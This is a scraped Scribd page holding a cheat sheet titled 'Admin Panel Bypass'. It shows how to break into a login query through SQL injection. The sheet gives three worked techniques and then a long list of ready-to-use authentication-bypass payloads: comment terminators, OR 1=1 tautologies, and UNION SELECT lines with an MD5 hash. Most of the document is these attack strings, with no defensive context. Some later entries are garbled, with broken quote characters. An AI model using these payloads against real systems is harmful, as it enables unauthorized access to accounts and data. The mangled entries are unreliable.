Scribd
Upload
1K views3 pages

Admin Panel Bypass

This document discusses various SQL injection techniques for bypassing authentication on a database by manipulating the WHERE clause of a SQL SELECT statement. It provides examples of inserting comments, alternate syntax, concatenation, and boolean logic to circumvent validation of the username and password fields. Potential attackers are shown how to craft SQL statements that will always evaluate to true and return all account data regardless of the intended credentials.

Uploaded by

Bilal Sheikh
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
1K views3 pages

Admin Panel Bypass

This document discusses various SQL injection techniques for bypassing authentication on a database by manipulating the WHERE clause of a SQL SELECT statement. It provides examples of inserting comments, alternate syntax, concatenation, and boolean logic to circumvent validation of the username and password fields. Potential attackers are shown how to craft SQL statements that will always evaluate to true and return all account data regardless of the intended credentials.

Uploaded by

Bilal Sheikh
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 3

username = ?

password = ?

query: select from accounts where username='$username' and


password='$password' ;

Suppose username = admin

For bypassing password:

Technique #1: select from accounts where username='admin' # and


password='$password' ;

username=admin' #
password= [any word / random]

Technique #2: select from accounts where username='admin' and password='12345'


OR 1=1 # ;

username=admin
password=[any number / random]' OR 1=1 #

Technique #3:

username=' or ' '=' select from accounts where username=' ' OR ' ' = ' ' and
password=' ' OR ' ' = ' ' ;
password=' or ' '=' select from accounts where username=' ' OR '1' = '1' and
password=' ' OR '1' = '1' ;

Other techniques: (for both username and password)

or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--

� or 1=1 �
1'or�1'=�1
admin��
� or 0=0 �
or 0=0 �
� or 0=0 #
� or 0=0 #
or 0=0 #
� or �x�='x
� or �x�=�x
�) or (�x�='x
� or 1=1�
� or 1=1�
or 1=1�
� or a=a�
� or �a�=�a
�) or (�a�='a
�) or (�a�=�a
hi� or �a�=�a
hi� or 1=1 �
hi� or 1=1 �
hi� or �a�='a
hi�) or (�a�='a
hi�) or (�a�=�)

You might also like